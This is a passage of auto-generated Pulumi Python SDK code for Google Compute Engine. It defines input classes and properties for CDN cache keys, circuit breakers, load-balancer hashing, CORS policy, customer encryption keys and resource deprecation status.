query_string_whitelist: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
Message containing what to include in the cache key for a request for Cloud CDN.
:param pulumi.Input[bool] include_host: If true, requests to different hosts will be cached separately.
:param pulumi.Input[Sequence[pulumi.Input[str]]] include_http_headers: Allows HTTP request headers (by name) to be used in the cache key.
:param pulumi.Input[Sequence[pulumi.Input[str]]] include_named_cookies: Allows HTTP cookies (by name) to be used in the cache key. The name=value pair will be used in the cache key Cloud CDN generates.
:param pulumi.Input[bool] include_protocol: If true, http and https requests will be cached separately.
:param pulumi.Input[bool] include_query_string: If true, include query string parameters in the cache key according to query_string_whitelist and query_string_blacklist. If neither is set, the entire query string will be included. If false, the query string will be excluded from the cache key entirely.
:param pulumi.Input[Sequence[pulumi.Input[str]]] query_string_blacklist: Names of query string parameters to exclude in cache keys. All other parameters will be included. Either specify query_string_whitelist or query_string_blacklist, not both. '&' and '=' will be percent encoded and not treated as delimiters.
:param pulumi.Input[Sequence[pulumi.Input[str]]] query_string_whitelist: Names of query string parameters to include in cache keys. All other parameters will be excluded. Either specify query_string_whitelist or query_string_blacklist, not both. '&' and '=' will be percent encoded and not treated as delimiters.
"""
if include_host is not None:
pulumi.set(__self__, "include_host", include_host)
if include_http_headers is not None:
pulumi.set(__self__, "include_http_headers", include_http_headers)
if include_named_cookies is not None:
pulumi.set(__self__, "include_named_cookies", include_named_cookies)
if include_protocol is not None:
pulumi.set(__self__, "include_protocol", include_protocol)
if include_query_string is not None:
pulumi.set(__self__, "include_query_string", include_query_string)
if query_string_blacklist is not None:
pulumi.set(__self__, "query_string_blacklist", query_string_blacklist)
if query_string_whitelist is not None:
pulumi.set(__self__, "query_string_whitelist", query_string_whitelist)
@property
@pulumi.getter(name="includeHost")
def include_host(self) -> Optional[pulumi.Input[bool]]:
"""
If true, requests to different hosts will be cached separately.
"""
return pulumi.get(self, "include_host")
@include_host.setter
def include_host(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "include_host", value)
@property
@pulumi.getter(name="includeHttpHeaders")
def include_http_headers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Allows HTTP request headers (by name) to be used in the cache key.
"""
return pulumi.get(self, "include_http_headers")
@include_http_headers.setter
def include_http_headers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "include_http_headers", value)
@property
@pulumi.getter(name="includeNamedCookies")
def include_named_cookies(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Allows HTTP cookies (by name) to be used in the cache key. The name=value pair will be used in the cache key Cloud CDN generates.
"""
return pulumi.get(self, "include_named_cookies")
@include_named_cookies.setter
def include_named_cookies(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "include_named_cookies", value)
@property
@pulumi.getter(name="includeProtocol")
def include_protocol(self) -> Optional[pulumi.Input[bool]]:
"""
If true, http and https requests will be cached separately.
"""
return pulumi.get(self, "include_protocol")
@include_protocol.setter
def include_protocol(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "include_protocol", value)
@property
@pulumi.getter(name="includeQueryString")
def include_query_string(self) -> Optional[pulumi.Input[bool]]:
"""
If true, include query string parameters in the cache key according to query_string_whitelist and query_string_blacklist. If neither is set, the entire query string will be included. If false, the query string will be excluded from the cache key entirely.
"""
return pulumi.get(self, "include_query_string")
@include_query_string.setter
def include_query_string(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "include_query_string", value)
@property
@pulumi.getter(name="queryStringBlacklist")
def query_string_blacklist(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Names of query string parameters to exclude in cache keys. All other parameters will be included. Either specify query_string_whitelist or query_string_blacklist, not both. '&' and '=' will be percent encoded and not treated as delimiters.
"""
return pulumi.get(self, "query_string_blacklist")
@query_string_blacklist.setter
def query_string_blacklist(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "query_string_blacklist", value)
@property
@pulumi.getter(name="queryStringWhitelist")
def query_string_whitelist(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Names of query string parameters to include in cache keys. All other parameters will be excluded. Either specify query_string_whitelist or query_string_blacklist, not both. '&' and '=' will be percent encoded and not treated as delimiters.
"""
return pulumi.get(self, "query_string_whitelist")
@query_string_whitelist.setter
def query_string_whitelist(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "query_string_whitelist", value)
@pulumi.input_type
class CircuitBreakersArgs:
def __init__(__self__, *,
connect_timeout: Optional[pulumi.Input['DurationArgs']] = None,
max_connections: Optional[pulumi.Input[int]] = None,
max_pending_requests: Optional[pulumi.Input[int]] = None,
max_requests: Optional[pulumi.Input[int]] = None,
max_requests_per_connection: Optional[pulumi.Input[int]] = None,
max_retries: Optional[pulumi.Input[int]] = None):
"""
Settings controlling the volume of requests, connections and retries to this backend service.
:param pulumi.Input['DurationArgs'] connect_timeout: The timeout for new network connections to hosts.
:param pulumi.Input[int] max_connections: Not supported when the backend service is referenced by a URL map that is bound to target gRPC proxy that has validateForProxyless field set to true.
:param pulumi.Input[int] max_pending_requests: Not supported when the backend service is referenced by a URL map that is bound to target gRPC proxy that has validateForProxyless field set to true.
:param pulumi.Input[int] max_requests: The maximum number of parallel requests that allowed to the backend service. If not specified, there is no limit.
:param pulumi.Input[int] max_requests_per_connection: Not supported when the backend service is referenced by a URL map that is bound to target gRPC proxy that has validateForProxyless field set to true.
:param pulumi.Input[int] max_retries: Not supported when the backend service is referenced by a URL map that is bound to target gRPC proxy that has validateForProxyless field set to true.
"""
if connect_timeout is not None:
pulumi.set(__self__, "connect_timeout", connect_timeout)
if max_connections is not None:
pulumi.set(__self__, "max_connections", max_connections)
if max_pending_requests is not None:
pulumi.set(__self__, "max_pending_requests", max_pending_requests)
if max_requests is not None:
pulumi.set(__self__, "max_requests", max_requests)
if max_requests_per_connection is not None:
pulumi.set(__self__, "max_requests_per_connection", max_requests_per_connection)
if max_retries is not None:
pulumi.set(__self__, "max_retries", max_retries)
@property
@pulumi.getter(name="connectTimeout")
def connect_timeout(self) -> Optional[pulumi.Input['DurationArgs']]:
"""
The timeout for new network connections to hosts.
"""
return pulumi.get(self, "connect_timeout")
@connect_timeout.setter
def connect_timeout(self, value: Optional[pulumi.Input['DurationArgs']]):
pulumi.set(self, "connect_timeout", value)
@property
@pulumi.getter(name="maxConnections")
def max_connections(self) -> Optional[pulumi.Input[int]]:
"""
Not supported when the backend service is referenced by a URL map that is bound to target gRPC proxy that has validateForProxyless field set to true.
"""
return pulumi.get(self, "max_connections")
@max_connections.setter
def max_connections(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_connections", value)
@property
@pulumi.getter(name="maxPendingRequests")
def max_pending_requests(self) -> Optional[pulumi.Input[int]]:
"""
Not supported when the backend service is referenced by a URL map that is bound to target gRPC proxy that has validateForProxyless field set to true.
"""
return pulumi.get(self, "max_pending_requests")
@max_pending_requests.setter
def max_pending_requests(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_pending_requests", value)
@property
@pulumi.getter(name="maxRequests")
def max_requests(self) -> Optional[pulumi.Input[int]]:
"""
The maximum number of parallel requests that allowed to the backend service. If not specified, there is no limit.
"""
return pulumi.get(self, "max_requests")
@max_requests.setter
def max_requests(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_requests", value)
@property
@pulumi.getter(name="maxRequestsPerConnection")
def max_requests_per_connection(self) -> Optional[pulumi.Input[int]]:
"""
Not supported when the backend service is referenced by a URL map that is bound to target gRPC proxy that has validateForProxyless field set to true.
"""
return pulumi.get(self, "max_requests_per_connection")
@max_requests_per_connection.setter
def max_requests_per_connection(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_requests_per_connection", value)
@property
@pulumi.getter(name="maxRetries")
def max_retries(self) -> Optional[pulumi.Input[int]]:
"""
Not supported when the backend service is referenced by a URL map that is bound to target gRPC proxy that has validateForProxyless field set to true.
"""
return pulumi.get(self, "max_retries")
@max_retries.setter
def max_retries(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_retries", value)
@pulumi.input_type
class ConditionArgs:
def __init__(__self__, *,
iam: Optional[pulumi.Input['ConditionIam']] = None,
op: Optional[pulumi.Input['ConditionOp']] = None,
svc: Optional[pulumi.Input[str]] = None,
sys: Optional[pulumi.Input['ConditionSys']] = None,
values: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
This is deprecated and has no effect. Do not use.
:param pulumi.Input['ConditionIam'] iam: This is deprecated and has no effect. Do not use.
:param pulumi.Input['ConditionOp'] op: This is deprecated and has no effect. Do not use.
:param pulumi.Input[str] svc: This is deprecated and has no effect. Do not use.
:param pulumi.Input['ConditionSys'] sys: This is deprecated and has no effect. Do not use.
:param pulumi.Input[Sequence[pulumi.Input[str]]] values: This is deprecated and has no effect. Do not use.
"""
if iam is not None:
pulumi.set(__self__, "iam", iam)
if op is not None:
pulumi.set(__self__, "op", op)
if svc is not None:
pulumi.set(__self__, "svc", svc)
if sys is not None:
pulumi.set(__self__, "sys", sys)
if values is not None:
pulumi.set(__self__, "values", values)
@property
@pulumi.getter
def iam(self) -> Optional[pulumi.Input['ConditionIam']]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "iam")
@iam.setter
def iam(self, value: Optional[pulumi.Input['ConditionIam']]):
pulumi.set(self, "iam", value)
@property
@pulumi.getter
def op(self) -> Optional[pulumi.Input['ConditionOp']]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "op")
@op.setter
def op(self, value: Optional[pulumi.Input['ConditionOp']]):
pulumi.set(self, "op", value)
@property
@pulumi.getter
def svc(self) -> Optional[pulumi.Input[str]]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "svc")
@svc.setter
def svc(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "svc", value)
@property
@pulumi.getter
def sys(self) -> Optional[pulumi.Input['ConditionSys']]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "sys")
@sys.setter
def sys(self, value: Optional[pulumi.Input['ConditionSys']]):
pulumi.set(self, "sys", value)
@property
@pulumi.getter
def values(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
This is deprecated and has no effect. Do not use.
"""
return pulumi.get(self, "values")
@values.setter
def values(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "values", value)
@pulumi.input_type
class ConfidentialInstanceConfigArgs:
def __init__(__self__, *,
enable_confidential_compute: Optional[pulumi.Input[bool]] = None):
"""
A set of Confidential Instance options.
:param pulumi.Input[bool] enable_confidential_compute: Defines whether the instance should have confidential compute enabled.
"""
if enable_confidential_compute is not None:
pulumi.set(__self__, "enable_confidential_compute", enable_confidential_compute)
@property
@pulumi.getter(name="enableConfidentialCompute")
def enable_confidential_compute(self) -> Optional[pulumi.Input[bool]]:
"""
Defines whether the instance should have confidential compute enabled.
"""
return pulumi.get(self, "enable_confidential_compute")
@enable_confidential_compute.setter
def enable_confidential_compute(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_confidential_compute", value)
@pulumi.input_type
class ConnectionDrainingArgs:
def __init__(__self__, *,
draining_timeout_sec: Optional[pulumi.Input[int]] = None):
"""
Message containing connection draining configuration.
:param pulumi.Input[int] draining_timeout_sec: Configures a duration timeout for existing requests on a removed backend instance. For supported load balancers and protocols, as described in Enabling connection draining.
"""
if draining_timeout_sec is not None:
pulumi.set(__self__, "draining_timeout_sec", draining_timeout_sec)
@property
@pulumi.getter(name="drainingTimeoutSec")
def draining_timeout_sec(self) -> Optional[pulumi.Input[int]]:
"""
Configures a duration timeout for existing requests on a removed backend instance. For supported load balancers and protocols, as described in Enabling connection draining.
"""
return pulumi.get(self, "draining_timeout_sec")
@draining_timeout_sec.setter
def draining_timeout_sec(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "draining_timeout_sec", value)
@pulumi.input_type
class ConsistentHashLoadBalancerSettingsHttpCookieArgs:
def __init__(__self__, *,
name: Optional[pulumi.Input[str]] = None,
path: Optional[pulumi.Input[str]] = None,
ttl: Optional[pulumi.Input['DurationArgs']] = None):
"""
The information about the HTTP Cookie on which the hash function is based for load balancing policies that use a consistent hash.
:param pulumi.Input[str] name: Name of the cookie.
:param pulumi.Input[str] path: Path to set for the cookie.
:param pulumi.Input['DurationArgs'] ttl: Lifetime of the cookie.
"""
if name is not None:
pulumi.set(__self__, "name", name)
if path is not None:
pulumi.set(__self__, "path", path)
if ttl is not None:
pulumi.set(__self__, "ttl", ttl)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the cookie.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def path(self) -> Optional[pulumi.Input[str]]:
"""
Path to set for the cookie.
"""
return pulumi.get(self, "path")
@path.setter
def path(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "path", value)
@property
@pulumi.getter
def ttl(self) -> Optional[pulumi.Input['DurationArgs']]:
"""
Lifetime of the cookie.
"""
return pulumi.get(self, "ttl")
@ttl.setter
def ttl(self, value: Optional[pulumi.Input['DurationArgs']]):
pulumi.set(self, "ttl", value)
@pulumi.input_type
class ConsistentHashLoadBalancerSettingsArgs:
def __init__(__self__, *,
http_cookie: Optional[pulumi.Input['ConsistentHashLoadBalancerSettingsHttpCookieArgs']] = None,
http_header_name: Optional[pulumi.Input[str]] = None,
minimum_ring_size: Optional[pulumi.Input[str]] = None):
"""
This message defines settings for a consistent hash style load balancer.
:param pulumi.Input['ConsistentHashLoadBalancerSettingsHttpCookieArgs'] http_cookie: Hash is based on HTTP Cookie. This field describes a HTTP cookie that will be used as the hash key for the consistent hash load balancer. If the cookie is not present, it will be generated. This field is applicable if the sessionAffinity is set to HTTP_COOKIE. Not supported when the backend service is referenced by a URL map that is bound to target gRPC proxy that has validateForProxyless field set to true.
:param pulumi.Input[str] http_header_name: The hash based on the value of the specified header field. This field is applicable if the sessionAffinity is set to HEADER_FIELD.
:param pulumi.Input[str] minimum_ring_size: The minimum number of virtual nodes to use for the hash ring. Defaults to 1024. Larger ring sizes result in more granular load distributions. If the number of hosts in the load balancing pool is larger than the ring size, each host will be assigned a single virtual node.
"""
if http_cookie is not None:
pulumi.set(__self__, "http_cookie", http_cookie)
if http_header_name is not None:
pulumi.set(__self__, "http_header_name", http_header_name)
if minimum_ring_size is not None:
pulumi.set(__self__, "minimum_ring_size", minimum_ring_size)
@property
@pulumi.getter(name="httpCookie")
def http_cookie(self) -> Optional[pulumi.Input['ConsistentHashLoadBalancerSettingsHttpCookieArgs']]:
"""
Hash is based on HTTP Cookie. This field describes a HTTP cookie that will be used as the hash key for the consistent hash load balancer. If the cookie is not present, it will be generated. This field is applicable if the sessionAffinity is set to HTTP_COOKIE. Not supported when the backend service is referenced by a URL map that is bound to target gRPC proxy that has validateForProxyless field set to true.
"""
return pulumi.get(self, "http_cookie")
@http_cookie.setter
def http_cookie(self, value: Optional[pulumi.Input['ConsistentHashLoadBalancerSettingsHttpCookieArgs']]):
pulumi.set(self, "http_cookie", value)
@property
@pulumi.getter(name="httpHeaderName")
def http_header_name(self) -> Optional[pulumi.Input[str]]:
"""
The hash based on the value of the specified header field. This field is applicable if the sessionAffinity is set to HEADER_FIELD.
"""
return pulumi.get(self, "http_header_name")
@http_header_name.setter
def http_header_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "http_header_name", value)
@property
@pulumi.getter(name="minimumRingSize")
def minimum_ring_size(self) -> Optional[pulumi.Input[str]]:
"""
The minimum number of virtual nodes to use for the hash ring. Defaults to 1024. Larger ring sizes result in more granular load distributions. If the number of hosts in the load balancing pool is larger than the ring size, each host will be assigned a single virtual node.
"""
return pulumi.get(self, "minimum_ring_size")
@minimum_ring_size.setter
def minimum_ring_size(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "minimum_ring_size", value)
@pulumi.input_type
class CorsPolicyArgs:
def __init__(__self__, *,
allow_credentials: Optional[pulumi.Input[bool]] = None,
allow_headers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
allow_methods: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
allow_origin_regexes: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
allow_origins: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
disabled: Optional[pulumi.Input[bool]] = None,
expose_headers: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
max_age: Optional[pulumi.Input[int]] = None):
"""
The specification for allowing client-side cross-origin requests. For more information about the W3C recommendation for cross-origin resource sharing (CORS), see Fetch API Living Standard.
:param pulumi.Input[bool] allow_credentials: In response to a preflight request, setting this to true indicates that the actual request can include user credentials. This field translates to the Access-Control-Allow-Credentials header. Default is false.
:param pulumi.Input[Sequence[pulumi.Input[str]]] allow_headers: Specifies the content for the Access-Control-Allow-Headers header.
:param pulumi.Input[Sequence[pulumi.Input[str]]] allow_methods: Specifies the content for the Access-Control-Allow-Methods header.
:param pulumi.Input[Sequence[pulumi.Input[str]]] allow_origin_regexes: Specifies a regular expression that matches allowed origins. For more information about the regular expression syntax, see Syntax. An origin is allowed if it matches either an item in allowOrigins or an item in allowOriginRegexes.
:param pulumi.Input[Sequence[pulumi.Input[str]]] allow_origins: Specifies the list of origins that is allowed to do CORS requests. An origin is allowed if it matches either an item in allowOrigins or an item in allowOriginRegexes.
:param pulumi.Input[bool] disabled: If true, the setting specifies the CORS policy is disabled. The default value of false, which indicates that the CORS policy is in effect.
:param pulumi.Input[Sequence[pulumi.Input[str]]] expose_headers: Specifies the content for the Access-Control-Expose-Headers header.
:param pulumi.Input[int] max_age: Specifies how long results of a preflight request can be cached in seconds. This field translates to the Access-Control-Max-Age header.
"""
if allow_credentials is not None:
pulumi.set(__self__, "allow_credentials", allow_credentials)
if allow_headers is not None:
pulumi.set(__self__, "allow_headers", allow_headers)
if allow_methods is not None:
pulumi.set(__self__, "allow_methods", allow_methods)
if allow_origin_regexes is not None:
pulumi.set(__self__, "allow_origin_regexes", allow_origin_regexes)
if allow_origins is not None:
pulumi.set(__self__, "allow_origins", allow_origins)
if disabled is not None:
pulumi.set(__self__, "disabled", disabled)
if expose_headers is not None:
pulumi.set(__self__, "expose_headers", expose_headers)
if max_age is not None:
pulumi.set(__self__, "max_age", max_age)
@property
@pulumi.getter(name="allowCredentials")
def allow_credentials(self) -> Optional[pulumi.Input[bool]]:
"""
In response to a preflight request, setting this to true indicates that the actual request can include user credentials. This field translates to the Access-Control-Allow-Credentials header. Default is false.
"""
return pulumi.get(self, "allow_credentials")
@allow_credentials.setter
def allow_credentials(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "allow_credentials", value)
@property
@pulumi.getter(name="allowHeaders")
def allow_headers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Specifies the content for the Access-Control-Allow-Headers header.
"""
return pulumi.get(self, "allow_headers")
@allow_headers.setter
def allow_headers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "allow_headers", value)
@property
@pulumi.getter(name="allowMethods")
def allow_methods(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Specifies the content for the Access-Control-Allow-Methods header.
"""
return pulumi.get(self, "allow_methods")
@allow_methods.setter
def allow_methods(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "allow_methods", value)
@property
@pulumi.getter(name="allowOriginRegexes")
def allow_origin_regexes(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Specifies a regular expression that matches allowed origins. For more information about the regular expression syntax, see Syntax. An origin is allowed if it matches either an item in allowOrigins or an item in allowOriginRegexes.
"""
return pulumi.get(self, "allow_origin_regexes")
@allow_origin_regexes.setter
def allow_origin_regexes(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "allow_origin_regexes", value)
@property
@pulumi.getter(name="allowOrigins")
def allow_origins(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Specifies the list of origins that is allowed to do CORS requests. An origin is allowed if it matches either an item in allowOrigins or an item in allowOriginRegexes.
"""
return pulumi.get(self, "allow_origins")
@allow_origins.setter
def allow_origins(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "allow_origins", value)
@property
@pulumi.getter
def disabled(self) -> Optional[pulumi.Input[bool]]:
"""
If true, the setting specifies the CORS policy is disabled. The default value of false, which indicates that the CORS policy is in effect.
"""
return pulumi.get(self, "disabled")
@disabled.setter
def disabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "disabled", value)
@property
@pulumi.getter(name="exposeHeaders")
def expose_headers(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Specifies the content for the Access-Control-Expose-Headers header.
"""
return pulumi.get(self, "expose_headers")
@expose_headers.setter
def expose_headers(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "expose_headers", value)
@property
@pulumi.getter(name="maxAge")
def max_age(self) -> Optional[pulumi.Input[int]]:
"""
Specifies how long results of a preflight request can be cached in seconds. This field translates to the Access-Control-Max-Age header.
"""
return pulumi.get(self, "max_age")
@max_age.setter
def max_age(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "max_age", value)
@pulumi.input_type
class CustomerEncryptionKeyArgs:
def __init__(__self__, *,
kms_key_name: Optional[pulumi.Input[str]] = None,
kms_key_service_account: Optional[pulumi.Input[str]] = None,
raw_key: Optional[pulumi.Input[str]] = None,
rsa_encrypted_key: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] kms_key_name: The name of the encryption key that is stored in Google Cloud KMS. For example: "kmsKeyName": "projects/kms_project_id/locations/region/keyRings/ key_region/cryptoKeys/key
:param pulumi.Input[str] kms_key_service_account: The service account being used for the encryption request for the given KMS key. If absent, the Compute Engine default service account is used. For example: "kmsKeyServiceAccount": "name@project_id.iam.gserviceaccount.com/
:param pulumi.Input[str] raw_key: Specifies a 256-bit customer-supplied encryption key, encoded in RFC 4648 base64 to either encrypt or decrypt this resource. You can provide either the rawKey or the rsaEncryptedKey. For example: "rawKey": "SGVsbG8gZnJvbSBHb29nbGUgQ2xvdWQgUGxhdGZvcm0="
:param pulumi.Input[str] rsa_encrypted_key: Specifies an RFC 4648 base64 encoded, RSA-wrapped 2048-bit customer-supplied encryption key to either encrypt or decrypt this resource. You can provide either the rawKey or the rsaEncryptedKey. For example: "rsaEncryptedKey": "ieCx/NcW06PcT7Ep1X6LUTc/hLvUDYyzSZPPVCVPTVEohpeHASqC8uw5TzyO9U+Fka9JFH z0mBibXUInrC/jEk014kCK/NPjYgEMOyssZ4ZINPKxlUh2zn1bV+MCaTICrdmuSBTWlUUiFoD D6PYznLwh8ZNdaheCeZ8ewEXgFQ8V+sDroLaN3Xs3MDTXQEMMoNUXMCZEIpg9Vtp9x2oe==" The key must meet the following requirements before you can provide it to Compute Engine: 1. The key is wrapped using a RSA public key certificate provided by Google. 2. After being wrapped, the key must be encoded in RFC 4648 base64 encoding. Gets the RSA public key certificate provided by Google at: https://cloud-certs.storage.googleapis.com/google-cloud-csek-ingress.pem
"""
if kms_key_name is not None:
pulumi.set(__self__, "kms_key_name", kms_key_name)
if kms_key_service_account is not None:
pulumi.set(__self__, "kms_key_service_account", kms_key_service_account)
if raw_key is not None:
pulumi.set(__self__, "raw_key", raw_key)
if rsa_encrypted_key is not None:
pulumi.set(__self__, "rsa_encrypted_key", rsa_encrypted_key)
@property
@pulumi.getter(name="kmsKeyName")
def kms_key_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the encryption key that is stored in Google Cloud KMS. For example: "kmsKeyName": "projects/kms_project_id/locations/region/keyRings/ key_region/cryptoKeys/key
"""
return pulumi.get(self, "kms_key_name")
@kms_key_name.setter
def kms_key_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_name", value)
@property
@pulumi.getter(name="kmsKeyServiceAccount")
def kms_key_service_account(self) -> Optional[pulumi.Input[str]]:
"""
The service account being used for the encryption request for the given KMS key. If absent, the Compute Engine default service account is used. For example: "kmsKeyServiceAccount": "name@project_id.iam.gserviceaccount.com/
"""
return pulumi.get(self, "kms_key_service_account")
@kms_key_service_account.setter
def kms_key_service_account(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "kms_key_service_account", value)
@property
@pulumi.getter(name="rawKey")
def raw_key(self) -> Optional[pulumi.Input[str]]:
"""
Specifies a 256-bit customer-supplied encryption key, encoded in RFC 4648 base64 to either encrypt or decrypt this resource. You can provide either the rawKey or the rsaEncryptedKey. For example: "rawKey": "SGVsbG8gZnJvbSBHb29nbGUgQ2xvdWQgUGxhdGZvcm0="
"""
return pulumi.get(self, "raw_key")
@raw_key.setter
def raw_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "raw_key", value)
@property
@pulumi.getter(name="rsaEncryptedKey")
def rsa_encrypted_key(self) -> Optional[pulumi.Input[str]]:
"""
Specifies an RFC 4648 base64 encoded, RSA-wrapped 2048-bit customer-supplied encryption key to either encrypt or decrypt this resource. You can provide either the rawKey or the rsaEncryptedKey. For example: "rsaEncryptedKey": "ieCx/NcW06PcT7Ep1X6LUTc/hLvUDYyzSZPPVCVPTVEohpeHASqC8uw5TzyO9U+Fka9JFH z0mBibXUInrC/jEk014kCK/NPjYgEMOyssZ4ZINPKxlUh2zn1bV+MCaTICrdmuSBTWlUUiFoD D6PYznLwh8ZNdaheCeZ8ewEXgFQ8V+sDroLaN3Xs3MDTXQEMMoNUXMCZEIpg9Vtp9x2oe==" The key must meet the following requirements before you can provide it to Compute Engine: 1. The key is wrapped using a RSA public key certificate provided by Google. 2. After being wrapped, the key must be encoded in RFC 4648 base64 encoding. Gets the RSA public key certificate provided by Google at: https://cloud-certs.storage.googleapis.com/google-cloud-csek-ingress.pem
"""
return pulumi.get(self, "rsa_encrypted_key")
@rsa_encrypted_key.setter
def rsa_encrypted_key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "rsa_encrypted_key", value)
@pulumi.input_type
class DeprecationStatusArgs:
def __init__(__self__, *,
deleted: Optional[pulumi.Input[str]] = None,
deprecated: Optional[pulumi.Input[str]] = None,
obsolete: Optional[pulumi.Input[str]] = None,
replacement: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input['DeprecationStatusState']] = None,
state_override: Optional[pulumi.Input['RolloutPolicyArgs']] = None):
"""
Deprecation status for a public resource.
:param pulumi.Input[str] deleted: An optional RFC3339 timestamp on or after which the state of this resource is intended to change to DELETED. This is only informational and the status will not change unless the client explicitly changes it.
:param pulumi.Input[str] deprecated: An optional RFC3339 timestamp on or after which the state of this resource is intended to change to DEPRECATED. This is only informational and the status will not change unless the client explicitly changes it.
:param pulumi.Input[str] obsolete: An optional RFC3339 timestamp on or after which the state of this resource is intended to change to OBSOLETE. This is only informational and the status will not change unless the client explicitly changes it.
:param pulumi.Input[str] replacement: The URL of the suggested replacement for a deprecated resource. The suggested replacement resource must be the same kind of resource as the deprecated resource.
:param pulumi.Input['DeprecationStatusState'] state: The deprecation state of this resource. This can be ACTIVE, DEPRECATED, OBSOLETE, or DELETED. Operations which communicate the end of life date for an image, can use ACTIVE. Operations which create a new resource using a DEPRECATED resource will return successfully, but with a warning indicating the deprecated resource and recommending its replacement. Operations which use OBSOLETE or DELETED resources will be rejected and result in an error.
:param pulumi.Input['RolloutPolicyArgs'] state_override: The rollout policy for this deprecation. This policy is only enforced by image family views. The rollout policy restricts the zones where the associated resource is considered in a deprecated state. When the rollout policy does not include the user specified zone, or if the zone is rolled out, the associated resource is considered in a deprecated state. The rollout policy for this deprecation is read-only, except for allowlisted users. This field might not be configured. To view the latest non-deprecated image in a specific zone, use the imageFamilyViews.get method.
"""
if deleted is not None:
pulumi.set(__self__, "deleted", deleted)
if deprecated is not None:
pulumi.set(__self__, "deprecated", deprecated)
if obsolete is not None:
pulumi.set(__self__, "obsolete", obsolete)
if replacement is not None:
pulumi.set(__self__, "replacement", replacement)
if state is not None:
pulumi.set(__self__, "state", state)
if state_override is not None:
pulumi.set(__self__, "state_override", state_override)
@property
@pulumi.getter
def deleted(self) -> Optional[pulumi.Input[str]]:
"""
An optional RFC3339 timestamp on or after which the state of this resource is intended to change to DELETED. This is only informational and the status will not change unless the client explicitly changes it.
"""
return pulumi.get(self, "deleted")
@deleted.setter
def deleted(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deleted", value)
@property
@pulumi.getter
def deprecated(self) -> Optional[pulumi.Input[str]]:
"""
An optional RFC3339 timestamp on or after which the state of this resource is intended to change to DEPRECATED. This is only informational and the status will not change unless the client explicitly changes it.
"""
return pulumi.get(self, "deprecated")
@deprecated.setter
def deprecated(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deprecated", value)
@property
@pulumi.getter
def obsolete(self) -> Optional[pulumi.Input[str]]:
"""
An optional RFC3339 timestamp on or after which the state of this resource is intended to change to OBSOLETE. This is only informational and the status will not change unless the client explicitly changes it.
"""
return pulumi.get(self, "obsolete")
@obsolete.setter
def obsolete(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "obsolete", value)
@property
@pulumi.getter
def replacement(self) -> Optional[pulumi.Input[str]]:
"""
The URL of the suggested replacement for a deprecated resource. The suggested replacement resource must be the same kind of resource as the deprecated resource.
